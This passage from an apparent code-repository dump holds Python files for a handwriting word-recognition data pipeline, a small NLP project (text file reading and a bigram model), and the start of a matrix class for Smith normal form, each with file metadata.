np.array(self.dataset['image'][index:until]) \n if self.partition in ['train']:\n x = pp.augmentation(x, \n rotation_range=5.0, \n scale_range=0.05, \n height_shift_range=0.025, \n width_shift_range=0.05, \n erode_range=5, \n dilate_range=3)\n x = pp.normalization(x)\n if self.partition in ['valid', 'train']:\n y = self.dataset['label'][index:until]\n # y = [self.tokenizer.texts_to_sequences(word.decode())[0] for word in y]\n # y = np.array([np.pad(np.asarray(seq), (0, self.maxTextLength-len(seq)), constant_values=(-1, self.PAD)) for seq in y])\n y_ = []\n for word in y:\n seq = self.tokenizer.texts_to_sequences(word.decode())[0]\n padded_seq = np.pad(seq, (0, self.maxTextLength-len(seq)))\n y_.append(padded_seq)\n\n y = np.array(y_)\n\n return (x, y)\n return x\n\n else :\n index = idx*self.batch_size + self.buf_size\n until = index+self.batch_size\n\n zipped = list(zip(self.img_buf, self.lab_buf))\n np.random.shuffle(zipped)\n\n X, Y = zip(*zipped)\n X = list(X)\n Y = list(Y)\n\n x = np.array(X[:self.batch_size])\n y = Y[:self.batch_size]\n\n if until < self.size:\n X[:self.batch_size] = self.dataset['image'][index:until]\n Y[:self.batch_size] = self.dataset['label'][index:until]\n\n elif index < self.size:\n X = X[until-self.size:]\n Y = Y[until-self.size:]\n until = self.size\n X[:until-index] = self.dataset['image'][index:until]\n Y[:until-index] = self.dataset['label'][index:until]\n\n else:\n X = X[self.batch_size:]\n Y = Y[self.batch_size:]\n\n self.img_buf = X\n self.lab_buf = Y\n\n x = pp.augmentation(x, \n rotation_range=5.0, \n scale_range=0.05, \n height_shift_range=0.025, \n width_shift_range=0.05, \n erode_range=5, \n dilate_range=3)\n x = pp.normalization(x)\n # y = 
[self.tokenizer.texts_to_sequences(word.decode())[0] for word in y]\n # y = np.array([np.pad(np.asarray(seq), (0, self.maxTextLength-len(seq)), constant_values=(-1, self.PAD)) for seq in y])\n y_ = []\n for word in y:\n seq = self.tokenizer.texts_to_sequences(word.decode())[0]\n padded_seq = np.pad(seq, (0, self.maxTextLength-len(seq)))\n y_.append(padded_seq)\n\n y = np.array(y_)\n\n return (x, y)\n\n\n\n def on_epoch_end(self):\n if self.partition in ['train'] and self.buf_size:\n self.img_buf = self.dataset['image'][0:self.buf_size]\n self.lab_buf = self.dataset['label'][0:self.buf_size]\n\n" }, { "alpha_fraction": 0.686956524848938, "alphanum_fraction": 0.686956524848938, "avg_line_length": 22.200000762939453, "blob_id": "fdad58b5a0858fd64bd6b78c8feb0e2ef319b64e", "content_id": "f984965d003f4c574f13f59916c7526a7831f71c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 115, "license_type": "no_license", "max_line_length": 60, "num_lines": 5, "path": "/src/config/config.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "import os\n\noutput_path = os.path.join(\"..\", \"output\")\n\njson_file = os.path.join(output_path, \"initial_params.json\")" }, { "alpha_fraction": 0.5181058645248413, "alphanum_fraction": 0.5292479395866394, "avg_line_length": 36.129310607910156, "blob_id": "669c871a29339e40c3d8baa6d70d52296da4d2ac", "content_id": "b4e05c764a98443d9e06aef0c2a8bc3611e4c8a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4308, "license_type": "no_license", "max_line_length": 190, "num_lines": 116, "path": "/src/Create_hdf5.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\nimport multiprocessing\nimport h5py\n\nfrom tqdm import tqdm\nfrom glob import glob\nfrom path import Path\nfrom functools import partial\nimport Preprocess_image as pp\n\nclass Sample():\n def __init__(self, file_path, label):\n self.file_path = file_path\n self.label = label\n\nclass Dataset():\n def __init__(self, raw_path):\n\n assert Path(raw_path).exists()\n\n self.dataset = {\n 'train': {\n 'image':[],\n 'label':[], \n 'augmentation':True\n }, \n 'test': {\n 'image':[], \n 'label':[], \n 'augmentation':False\n },\n 'valid': {\n 'image':[], \n 'label':[], \n 'augmentation':False\n }\n }\n self.samples = []\n self.imgdir = os.path.join(raw_path, \"words\")\n self.label_path = os.path.join(raw_path, \"words.txt\")\n self.partitions = ['train', 'test', 'valid']\n\n def make_partitions(self):\n label = open(self.label_path).read().splitlines()\n for line in label:\n if line[0] == '#' or not line:\n continue\n lineSplit = line.strip().split()\n if len(lineSplit) < 9:\n continue\n transcription = pp.preprocess_label(\" \".join(lineSplit[8:]), self.maxTextLength)\n if transcription[0]:\n transcription = transcription[1]\n else:\n continue\n fileNameSplit = lineSplit[0].split('-')\n fileName = os.path.join(self.imgdir, fileNameSplit[0], \"-\".join(fileNameSplit[0:2]), lineSplit[0]) + \".png\"\n sample = Sample(fileName, transcription)\n self.samples.append(sample)\n\n np.random.shuffle(self.samples)\n\n splitIdx1 = {'train':0, 'test':0, 'valid':0}\n splitIdx2 = {'train':0, 'test':0, 'valid':0}\n splitIdx1['test'] = splitIdx2['train'] = int(0.8 * len(self.samples))\n splitIdx2['test'] = splitIdx1['valid'] = int(0.9 * len(self.samples))\n splitIdx2['valid'] = len(self.samples)\n\n dataset = self.dataset\n for 
p in self.partitions:\n            dataset[p]['image'] += [sample.file_path for sample in self.samples[splitIdx1[p]:splitIdx2[p]]]\n            dataset[p]['label'] += [sample.label for sample in self.samples[splitIdx1[p]:splitIdx2[p]]]\n\n        return dataset\n\n    def read_partitions(self):\n        dataset = self.make_partitions()\n\n        for p in self.partitions:\n            self.dataset[p]['image'] += dataset[p]['image']\n            self.dataset[p]['label'] += dataset[p]['label']\n\n\n    def save_partitions(self, target, target_image_shape, maxTextLength=32):\n        self.maxTextLength = maxTextLength\n        self.read_partitions()\n\n        os.makedirs(os.path.dirname(target), exist_ok=True)\n        total = 0\n\n        with h5py.File(target, 'w') as hf:\n            for p in self.partitions:\n                size = (len(self.dataset[p]['image']), ) + target_image_shape[:2]\n                total += size[0]\n\n                hf.create_dataset(f\"{p}/image\", size, dtype=np.uint8, compression='gzip', compression_opts=9)\n                hf.create_dataset(f\"{p}/label\", (size[0],), dtype=f\"S{maxTextLength}\", compression='gzip', compression_opts=9)\n\n        pbar = tqdm(total=total)\n        batch_size = 1024\n\n        for p in self.partitions:\n            for batch in range(0, len(self.dataset[p]['image']), batch_size):\n                images = []\n\n                with multiprocessing.Pool(multiprocessing.cpu_count()) as pool:\n                    r = pool.map(partial(pp.preprocess_image, target_size=target_image_shape, augmentation=self.dataset[p]['augmentation']), self.dataset[p]['image'][batch:batch+batch_size])\n                    images.extend(r)  # extend, not append: keep a flat list of images for the slice assignment below\n                    pool.close()\n                    pool.join()\n\n                with h5py.File(target, \"a\") as hf:\n                    hf[f\"{p}/image\"][batch:batch+batch_size] = images\n                    hf[f\"{p}/label\"][batch:batch+batch_size] = [s.encode() for s in self.dataset[p]['label'][batch:batch+batch_size]]\n                    pbar.update(batch_size)\n\n" }, { "alpha_fraction": 0.5015636086463928, "alphanum_fraction": 0.515876829624176, "avg_line_length": 37.129310607910156, "blob_id": "08c5aaf845032193ca918759f4643409062fda3c", "content_id": "e722e8c6cb8e6ea1cff936806cf1638a69d8aa71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8314, "license_type": "no_license", "max_line_length": 139, "num_lines": 215, "path": "/src/data/generator.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "import h5py\nimport string\nimport numpy as np\nimport tensorflow as tf\n\nimport Preprocess_image as pp\nfrom data.tokenizer import Tokenizer\n\ndef preprocessor_helper(x, y, charset, partition, maxTextLength):\n    charset = charset.numpy().decode()\n    partition = partition.numpy().decode()\n    maxTextLength = maxTextLength.numpy()\n    y = y.numpy()\n    x = x.numpy()\n    tokenizer = Tokenizer(\n            filters=string.printable.translate(\n                str.maketrans(\"\", \"\", charset)\n            ), \n            charset=charset\n        )\n    if y.any():\n        y_ = []\n        for word in y:\n            seq = tokenizer.texts_to_sequences(word.decode())[0]\n            padded_seq = np.pad(seq, (0, maxTextLength-len(seq)))\n            y_.append(padded_seq)\n\n        y = np.array(y_)\n\n    if partition in [\"train\"]:\n        x = pp.augmentation(x, \n                rotation_range=5.0, \n                scale_range=0.05, \n                height_shift_range=0.025, \n                width_shift_range=0.05, \n                erode_range=5, \n                dilate_range=3)\n\n    x = pp.normalization(x)\n\n    if y.any():\n        return x, y\n    else:\n        return x\n\ndef create_dataset(source_path, charset, partition, maxTextLength, batch_size=32, buf_size=1000, prefetch_size=10):\n    with h5py.File(source_path, \"r\") as f:\n        imgs = f[partition][\"image\"][:100]\n        labels = f[partition][\"label\"][:100]\n    \n    def get_img_label(x):\n        index = x.numpy()\n        if partition in [\"test\"]:\n            return imgs[index]\n        else:\n            return 
imgs[index], labels[index]\n\n dataset_size = len(labels)\n indexes = [i for i in range(dataset_size)]\n np.random.shuffle(indexes)\n\n index_ds = tf.data.Dataset.from_tensor_slices(indexes)\n if partition in [\"train\"]:\n ds = index_ds.map(lambda x: tf.py_function(get_img_label, [x], [tf.uint8, tf.string])).shuffle(buf_size).batch(batch_size)\n final_ds = ds.map(lambda x,y: tf.py_function(preprocessor_helper, [x,y,charset,partition,maxTextLength], [tf.float32, tf.float32]))\n elif partition in [\"valid\"]:\n ds = index_ds.map(lambda x: tf.py_function(get_img_label, [x], [tf.uint8, tf.string])).batch(batch_size)\n final_ds = ds.map(lambda x,y: tf.py_function(preprocessor_helper, [x,y,charset,partition,maxTextLength], [tf.float32, tf.float32]))\n else:\n ds = index_ds.map(lambda x: tf.py_function(get_img_label, [x], [tf.uint8])).batch(batch_size)\n final_ds = ds.map(lambda x: tf.py_function(preprocessor_helper, [x,False,charset,partition,maxTextLength], [tf.float32]))\n\n return final_ds.prefetch(prefetch_size)\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n import cv2\n charset = string.printable[:84]\n tokenizer = Tokenizer(\n filters=string.printable.translate(\n str.maketrans(\"\", \"\", charset)\n ), \n charset=charset\n )\n ds = create_dataset(\"../data/dataset_hdf5/iam_words.hdf5\", string.printable[:84], \"train\", 32, 2, 10, 2)\n for i, l in ds.take(1):\n print(i.shape, tokenizer.sequences_to_texts(np.swapaxes([l.numpy()], 0, 1)))\n plt.subplot(121)\n plt.imshow(pp.adjust_to_see(i[0].numpy()), cmap=\"gray\")\n plt.subplot(122)\n plt.imshow(pp.adjust_to_see(i[1].numpy()), cmap=\"gray\")\n plt.show()\n\n# class Datagenerator(tf.keras.utils.Sequence):\n# def __init__(self, source_path, charset, partition, maxTextLength, batch_size=32, buf_size=0):\n# self.maxTextLength = maxTextLength\n# self.tokenizer = Tokenizer(\n# filters=string.printable.translate(\n# str.maketrans(\"\", \"\", charset)\n# ), \n# charset=charset\n# )\n# # self.tokenizer.fit_on_texts(charset)\n# self.batch_size = batch_size\n# self.partition = partition\n# self.source_path = source_path\n# with h5py.File(self.source_path, 'r') as a:\n# dataset = a[self.partition]\n# self.size = dataset['label'].shape[0]\n# self.steps = int(np.ceil(self.size/self.batch_size))\n# self.buf_size = buf_size\n\n# # if self.partition in ['train'] and self.buf_size:\n# # self.img_buf = self.dataset['image'][0:self.buf_size]\n# # self.lab_buf = self.dataset['label'][0:self.buf_size]\n\n# # for p in self.partitions:\n# # self.size[p] = self.dataset[p]['image'].shape[0]\n# # self.steps[p] = int(np.ceil(self.size[p]/self.batch_size))\n# # self.index[p] = 0\n\n\n# def __len__(self):\n# return self.steps\n \n# def __getitem__(self, idx):\n# # if self.partition in ['valid', 'test'] or not self.buf_size:\n# with h5py.File(self.source_path, 'r') as a:\n# dataset = a[self.partition]\n# index = idx*self.batch_size\n# until = index+self.batch_size\n\n# x = np.array(dataset['image'][index:until]) \n# if self.partition in ['train']:\n# x = pp.augmentation(x, \n# rotation_range=5.0, \n# scale_range=0.05, \n# height_shift_range=0.025, \n# width_shift_range=0.05, \n# erode_range=5, \n# dilate_range=3)\n# x = pp.normalization(x)\n# if self.partition in ['valid', 'train']:\n# y = dataset['label'][index:until]\n# # y = [self.tokenizer.texts_to_sequences(word.decode())[0] for word in y]\n# # y = np.array([np.pad(np.asarray(seq), (0, self.maxTextLength-len(seq)), constant_values=(-1, self.PAD)) for seq in y])\n# y_ = []\n# for word in y:\n# 
seq = self.tokenizer.texts_to_sequences(word.decode())[0]\n# padded_seq = np.pad(seq, (0, self.maxTextLength-len(seq)))\n# y_.append(padded_seq)\n\n# y = np.array(y_)\n\n# return (x, y)\n# return x\n\n# # else :\n# # index = idx*self.batch_size + self.buf_size\n# # until = index+self.batch_size\n\n# # zipped = list(zip(self.img_buf, self.lab_buf))\n# # np.random.shuffle(zipped)\n\n# # X, Y = zip(*zipped)\n# # X = list(X)\n# # Y = list(Y)\n\n# # x = np.array(X[:self.batch_size])\n# # y = Y[:self.batch_size]\n\n# # if until < self.size:\n# # X[:self.batch_size] = self.dataset['image'][index:until]\n# # Y[:self.batch_size] = self.dataset['label'][index:until]\n\n# # elif index < self.size:\n# # X = X[until-self.size:]\n# # Y = Y[until-self.size:]\n# # until = self.size\n# # X[:until-index] = self.dataset['image'][index:until]\n# # Y[:until-index] = self.dataset['label'][index:until]\n\n# # else:\n# # X = X[self.batch_size:]\n# # Y = Y[self.batch_size:]\n\n# # self.img_buf = X\n# # self.lab_buf = Y\n\n# # x = pp.augmentation(x, \n# # rotation_range=5.0, \n# # scale_range=0.05, \n# # height_shift_range=0.025, \n# # width_shift_range=0.05, \n# # erode_range=5, \n# # dilate_range=3)\n# # x = pp.normalization(x)\n# # # y = [self.tokenizer.texts_to_sequences(word.decode())[0] for word in y]\n# # # y = np.array([np.pad(np.asarray(seq), (0, self.maxTextLength-len(seq)), constant_values=(-1, self.PAD)) for seq in y])\n# # y_ = []\n# # for word in y:\n# # seq = self.tokenizer.texts_to_sequences(word.decode())[0]\n# # padded_seq = np.pad(seq, (0, self.maxTextLength-len(seq)))\n# # y_.append(padded_seq)\n\n# # y = np.array(y_)\n\n# # return (x, y)\n\n\n\n# # def on_epoch_end(self):\n# # if self.partition in ['train'] and self.buf_size:\n# # self.img_buf = self.dataset['image'][0:self.buf_size]\n# # self.lab_buf = self.dataset['label'][0:self.buf_size]\n\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 12.333333015441895, "blob_id": "bbdcb0dc36165c82c7cfb02c7a79ede9b8db5bd0", "content_id": "76474f774b17c3b37c83a6ec2ea5430ef01ad83b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40, "license_type": "no_license", "max_line_length": 24, "num_lines": 3, "path": "/src/test.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "from data import imgproc\n\nprint(\"main\")\n" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 16, "blob_id": "5c97dadc4ffe0a75ea2b3d9f7c775207f8b216e0", "content_id": "c9d095f5c16618b17fc2d0cdd80213d581965374", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 102, "license_type": "no_license", "max_line_length": 16, "num_lines": 6, "path": "/README.md", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "# project_backup\n# project_backup\n# project_backup\n# project_backup\n# project_backup\n# project_backup\n" }, { "alpha_fraction": 0.5454959869384766, "alphanum_fraction": 0.576282799243927, "avg_line_length": 31.723880767822266, "blob_id": "cf9137623bcfbf69c28009c718f17db9b3d2bd18", "content_id": "d282363e4ec6095adf89ab5956fa8048d2525e63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4385, "license_type": "no_license", "max_line_length": 123, "num_lines": 134, "path": "/src/Preprocess_image.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", 
"text": "import cv2\nimport numpy as np\n\ndef adjust_to_see(img):\n (h, w) = img.shape[:2]\n (cX, cY) = (w // 2, h // 2)\n\n M = cv2.getRotationMatrix2D((cX, cY), -90, 1.0)\n cos = np.abs(M[0, 0])\n sin = np.abs(M[0, 1])\n\n nW = int((h * sin) + (w * cos))\n nH = int((h * cos) + (w * sin))\n\n M[0, 2] += (nW / 2) - cX\n M[1, 2] += (nH / 2) - cY\n\n img = cv2.warpAffine(img, M, (nW + 1, nH + 1))\n img = cv2.warpAffine(img.transpose(), M, (nW, nH))\n\n return img\n\n\ndef imread(img_path, target_size):\n img = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\n if img is None:\n img = np.zeros((target_size[1], target_size[0]), dtype=np.uint8)\n u, i = np.unique(img.flatten(), return_inverse=True)\n background_intensity = int(u[np.argmax(np.bincount(i))])\n return img, background_intensity\n\ndef preprocess_image(image_path, target_size, augmentation=False):\n image, bg_intensity = imread(image_path, target_size)\n (t_w, t_h, ch) = target_size\n (h, w) = image.shape\n fx = w/t_w\n fy = h/t_h\n f = max(fx, fy)\n newsize = (max(min(t_w, int(w / f)), 1), max(min(t_h, int(h / f)), 1))\n image = cv2.resize(image, newsize)\n (h, w) = image.shape\n background = np.ones((t_h, t_w), dtype=np.uint8) * bg_intensity\n row_freedom = background.shape[0]-image.shape[0]\n col_freedom = background.shape[1]-image.shape[1]\n row_off=0\n col_off=0\n if augmentation:\n if row_freedom:\n row_off = np.random.randint(0, row_freedom)\n if col_freedom:\n col_off = np.random.randint(0, col_freedom)\n else:\n row_off, col_off = row_freedom//2 , col_freedom//2\n \n background[row_off:row_off+h, col_off:col_off+w] = image\n \n image = cv2.transpose(background)\n return image\n\ndef augmentation(image_batch, \n rotation_range=0, \n scale_range=0, \n height_shift_range=0, \n width_shift_range=0,\n dilate_range=1, \n erode_range=1):\n\n imgs = np.asarray(image_batch)\n _, h, w = imgs.shape\n\n background_intensity = []\n for img in imgs: \n u, i = np.unique(img.flatten(), return_inverse=True)\n background_intensity.append(int(u[np.argmax(np.bincount(i))]))\n\n imgs = imgs.astype(np.float32)\n\n dilate_kernel = np.ones((int(np.random.uniform(1, dilate_range)),), np.uint8)\n erode_kernel = np.ones((int(np.random.uniform(1, erode_range)),), np.uint8)\n height_shift = np.random.uniform(-height_shift_range, height_shift_range)\n rotation = np.random.uniform(-rotation_range, rotation_range)\n scale = np.random.uniform(1 - scale_range, 1)\n width_shift = np.random.uniform(-width_shift_range, width_shift_range)\n trans_map = np.float32([[1, 0, width_shift * w], [0, 1, height_shift * h]])\n rot_map = cv2.getRotationMatrix2D((w // 2, h // 2), rotation, scale)\n\n trans_map_aff = np.r_[trans_map, [[0, 0, 1]]]\n rot_map_aff = np.r_[rot_map, [[0, 0, 1]]]\n affine_mat = rot_map_aff.dot(trans_map_aff)[:2, :]\n\n for i in range(_):\n imgs[i] = cv2.warpAffine(imgs[i], affine_mat, (w, h), flags=cv2.INTER_NEAREST, borderValue=background_intensity[i])\n imgs[i] = cv2.erode(imgs[i], erode_kernel, iterations=1)\n imgs[i] = cv2.dilate(imgs[i], dilate_kernel, iterations=1)\n if np.random.random() < 0.1:\n \timgs[i] = 255 - imgs[i]\n\n return imgs\n\ndef normalization(image_batch):\n imgs = np.asarray(image_batch).astype(np.float32)\n imgs = np.expand_dims(imgs / 255, axis=-1)\n return imgs\n\ndef preprocess_label(text, maxTextLength):\n cost = 0\n for i in range(len(text)):\n if i != 0 and text[i] == text[i-1]:\n cost += 2\n else:\n cost += 1\n\n if cost > maxTextLength:\n return (False, text[:i])\n\n return (True, text)\n \nif __name__ == 
\"__main__\":\n img1 = cv2.imread(\"t.png\", 0)\n import matplotlib.pyplot as plt\n\n plt.subplot(121)\n plt.imshow(img1, cmap='gray')\n img2 = preprocess_image(\"t.png\", (256, 64, 1), True)\n img2 = augmentation([img2],rotation_range=20.0, \n scale_range=0.05, \n height_shift_range=0.025, \n width_shift_range=0.05, \n erode_range=5, \n dilate_range=3)\n img2 = normalization(img2)[0]\n plt.subplot(122)\n plt.imshow(adjust_to_see(img2), cmap='gray')\n plt.show()\n" } ]
7
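A smoke test for the preprocessing helpers in the record above, using a synthetic batch instead of the IAM data; it assumes Preprocess_image.py (and its cv2 dependency) is importable, e.g. when run from src/:

```python
import numpy as np
import Preprocess_image as pp

# fake batch of four 128x32 grayscale "word" images (stand-in for IAM crops)
batch = np.random.randint(0, 256, size=(4, 128, 32), dtype=np.uint8)

batch = pp.augmentation(batch,
                        rotation_range=5.0, scale_range=0.05,
                        height_shift_range=0.025, width_shift_range=0.05,
                        erode_range=5, dilate_range=3)
batch = pp.normalization(batch)  # scales to [0, 1] and adds a channel axis
print(batch.shape, batch.dtype)  # (4, 128, 32, 1) float32
```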
jangwoopark/short-nlp
https://github.com/jangwoopark/short-nlp
9a57e80ae430296333936a03100345244f139ecb
2c546cd537c73996d7c5bdaba8dd7ff049d25003
0ad0da9cf963716611d32483fd45d54644253d23
refs/heads/master
2021-05-10T23:57:38.370603
2018-12-27T00:27:49
2018-12-27T00:27:49
118,294,291
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6131221652030945, "alphanum_fraction": 0.6146304607391357, "avg_line_length": 31.341463088989258, "blob_id": "344321c6883bd122523acc6cd54c7ade152c53d1", "content_id": "e2b9c4f5ddc44650ecf1cb8c6feb6d65b4e18eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1326, "license_type": "no_license", "max_line_length": 101, "num_lines": 41, "path": "/read.py", "repo_name": "jangwoopark/short-nlp", "src_encoding": "UTF-8", "text": "\"\"\"Reading in text files.\"\"\" \n\ndef read_file(filename):\n \"\"\"Read a plain text file and return the contents as a string.\"\"\"\n # TODO: Open \"filename\", read text and return it\n with open(filename) as f:\n text = f.read()\n return text\n\ndef read_files(path):\n \"\"\"Read all files that match given path and return a dict with their contents.\"\"\"\n\n # TODO: Get a list of all files that match path (hint: use glob)\n import glob\n import os\n files = []\n for name in glob.iglob(os.path.join(os.getcwd()+'/'+path)):\n files.append(name)\n # TODO: Read each file using read_file()\n\n # TODO: Store & return a dict of the form { <filename>: <contents> } Note: <filename> is just the\n # filename (e.g. \"hieroglyph.txt\") not the full path (\"data/hieroglyph.txt\")\n file_contents_mapping = {}\n for path in enumerate(files):\n path = path[1]\n extracted_filename_from_path = path.split(\"/\")[-1]\n file_contents_mapping[extracted_filename_from_path] = read_file(path)\n return file_contents_mapping\n\ndef test_run():\n # Test read_file()\n print(read_file(\"data/hieroglyph.txt\"))\n\n # Test read_files()\n texts = read_files(\"data/*.txt\")\n for name in texts:\n print(\"\\n***\", name, \"***\")\n print(texts[name])\n\nif __name__ == '__main__':\n test_run()\n" }, { "alpha_fraction": 0.6379696130752563, "alphanum_fraction": 0.643336296081543, "avg_line_length": 42, "blob_id": "ebddbd1d22565bd5fe00349b11e25a4cd2cc5184", "content_id": "1929dadb02169b2c2b38ac2c8a5ebb30a635e479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4472, "license_type": "no_license", "max_line_length": 112, "num_lines": 104, "path": "/bigram.py", "repo_name": "jangwoopark/short-nlp", "src_encoding": "UTF-8", "text": "\"\"\"Bigram Model.\"\"\" \n\nimport os \nimport re \nimport random \nimport collections \n\ndef read_file(filename):\n \"\"\"Read a plain text file and return the contents as a string.\"\"\"\n with open(filename, 'r') as f:\n text= f.read()\n return text\n\ndef compute_bigram_model(path, files):\n \"\"\"Compute a bigram model for a given corpus, including unigram probabilities.\n Params\n ======\n path: directory where input files are located\n files: list of files, or a single string specifying regex pattern to match (e.g. 
r'.*\\.txt')\n    Returns\n    =======\n    p_unigrams: dict with frequency of single words (need not be normalized to [0, 1])\n    p_bigrams: dict of dicts with frequency of bigrams (need not be normalized to [0, 1])\n    \"\"\"\n    # Grab a list of all files in specified corpus\n\n    if isinstance(files, str):\n        files = [f for f in os.listdir(path) if re.match(files, f)] # collect all matching filenames\n    files = [os.path.join(path, f) for f in files] # prepend path to each filename\n\n    # TODO: Read in text from each file and combine into a single string\n\n    filenames= [os.path.basename(file_path) for file_path in files]\n    contents= [read_file(file_path) for file_path in files]\n    contents_dict= dict(zip(filenames, contents))\n\n    # TODO: Clean and tokenize text (note that you may want to retain case and sentence delimiters)\n    words= []\n    for key, val in contents_dict.items():\n        contents_dict[key]= re.findall(\"\\w+\", val)\n        words += contents_dict[key]  # accumulate tokens across all files, not just the last one\n    unigram_counts= collections.Counter()\n    unigram_counts.update(words)\n    total_counts= float(sum(unigram_counts.values()))\n    bigrams= collections.defaultdict(list)\n\n    # TODO: Compute unigram probabilities\n\n    # unigram probabilities (zip keys with their counts; elements() would repeat each word per count)\n    unigram_keys= list(unigram_counts.keys())\n    unigram_vals= unigram_counts.values()\n    unigram_probs= [value/total_counts for value in unigram_vals]\n    p_unigrams= dict(zip(unigram_keys, unigram_probs))\n\n    # TODO: Compute bigram probabilities\n\n    # assemble bigrams dictionary\n    for i in range(len(words) - 1):\n        current_word= words[i]\n        next_word= words[i + 1]\n        bigrams[current_word].append(next_word)\n    # convert to probabilities\n    p_bigrams= dict()\n    for word in bigrams.keys():\n        bigram_counts= collections.Counter()\n        bigram_counts.update(bigrams[word])\n        bigram_keys= list(bigram_counts.keys())\n        bigram_values= bigram_counts.values()\n        word_sum= float(sum(bigram_values))\n        bigram_probs= [value/word_sum for value in bigram_values]\n        p_bigrams[word]= dict(zip(bigram_keys, bigram_probs))\n    return p_unigrams, p_bigrams \n\ndef generate_sequence(p_unigrams, p_bigrams, num_words=100, seed_word=None):\n    \"\"\"Generate a random sequence of words, given unigram and bigram probabilities.\"\"\"\n    # If seed_word is not given, pick one randomly based on unigram probabilities\n    if seed_word is None:\n        seed_word = random.choices(list(p_unigrams.keys()), weights=list(p_unigrams.values()))[0]\n    seq = [seed_word]\n    for i in range(num_words):\n        seq.append(random.choices(list(p_bigrams[seq[-1]].keys()),weights=list(p_bigrams[seq[-1]].values()))[0])\n    return seq \n\ndef test_run():\n    # Compute bigram model\n    p_unigrams, p_bigrams = compute_bigram_model(path='.', files=['data/carroll-alice.txt'])\n    # Check most common unigrams (single words)\n    print(\"10 most common unigrams:\")\n    sorted_unigrams = sorted(p_unigrams.items(), key=lambda item: item[1], reverse=True) # each item = (i,count)\n    for word, count in sorted_unigrams[:10]:\n        print(\"{}\\t{}\".format(word, count))\n    # Check most common bigrams (pairs of words)\n    all_bigrams = [(i, j, count) for i in p_bigrams.keys() for j, count in p_bigrams[i].items()]\n    sorted_bigrams = sorted(all_bigrams, key=lambda item: item[2], reverse=True) # each item = (i, j,count)\n    print(\"10 most common bigrams:\")\n    for i, j, count in sorted_bigrams[:10]:\n        print(\"{}\\t{}\\t{}\".format(i, j, count))\n    # Generate a sample sequence of words\n    seq = generate_sequence(p_unigrams, p_bigrams, 
seed_word=\"Alice\")\n print(\" \".join(seq)) \n\nif __name__ == \"__main__\":\n test_run()\n" }, { "alpha_fraction": 0.7840909361839294, "alphanum_fraction": 0.7840909361839294, "avg_line_length": 28.33333396911621, "blob_id": "c38090d4b81b569784f990d058f5bb048474709b", "content_id": "bf5b067a2265e944137de2d124cc2dd813044c81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 352, "license_type": "no_license", "max_line_length": 101, "num_lines": 12, "path": "/README.md", "repo_name": "jangwoopark/short-nlp", "src_encoding": "UTF-8", "text": "# short-nlp\n## text processing\n\nRead.py for reading from CSV files.\n\nSplit.py for splitting into sentences and into words.\n\nbigram.py for statistical pairs of words.\n\nEach text should be under the data folder, and the path should be in the corresponding input command.\n\nThe resource file has links to interesting reads for those who want to go beyond.\n" } ]
3
dzinghan/smith-normal-form-calculator
https://github.com/dzinghan/smith-normal-form-calculator
fc18ed87ce6b4751d0ef8e28018cbbb2afef6da1
f6211f7fb054096bad1bec728c83d7975534d8da
3dbb3aad555a878f5b65980e5cbe8e6208889a16
refs/heads/master
2022-12-03T10:02:11.827960
2020-08-22T16:37:11
2020-08-22T16:37:11
289160902
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.47213777899742126, "alphanum_fraction": 0.48391589522361755, "avg_line_length": 29.766128540039062, "blob_id": "3a12f37d8527ddc4ab2b1705ca9e11c6af44acc3", "content_id": "c3303363cf00bb6c9ac21c75e43d3dc3f19053a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7896, "license_type": "no_license", "max_line_length": 99, "num_lines": 248, "path": "/Matrix1.py", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "'''\r\nLouis Philippe Ignatieff\r\nQiu Shi Wang\r\nJing Han Sun\r\n'''\r\n\r\n'''Here is our implementation of a Matrix1 class mainly for the purpose of calculating\r\nthe Smith normal form. We do not explain all the methods in detail.'''\r\n\r\n\r\nimport copy\r\nclass Matrix1(object):\r\n \r\n def __init__(self, list):\r\n '''initialize the matrix as a list of lists, every list, a row'''\r\n self.list = list\r\n self.nrows = len(list)\r\n self.ncols = len(list[0])\r\n self.shape = (self.nrows, self.ncols)\r\n \r\n def is_zero(self):\r\n '''check for the zero matrix'''\r\n for row in self:\r\n for entry in row:\r\n if entry != 0:\r\n return False\r\n return True\r\n \r\n def __setitem__(self,coords,v):\r\n '''initialize item assignments'''\r\n i, j = coords\r\n self.list[i][j] = v\r\n \r\n def __getitem__(self,coords):\r\n '''initialize an index method for matrices'''\r\n if isinstance(coords, int):\r\n return self.list[coords]\r\n else:\r\n i, j = coords\r\n return self.list[i][j]\r\n\r\n def row(self, index):\r\n '''returns the row vector/matrix for a given index'''\r\n return Matrix1([self.list[index]])\r\n\r\n def T(self):\r\n '''returns the transpose of the matrix'''\r\n tr = []\r\n cols = []\r\n for i in range(self.ncols):\r\n for row in self.list:\r\n cols.append(row[i])\r\n if len(cols) == self.nrows:\r\n tr.append(cols)\r\n cols = []\r\n return Matrix1(tr)\r\n \r\n def 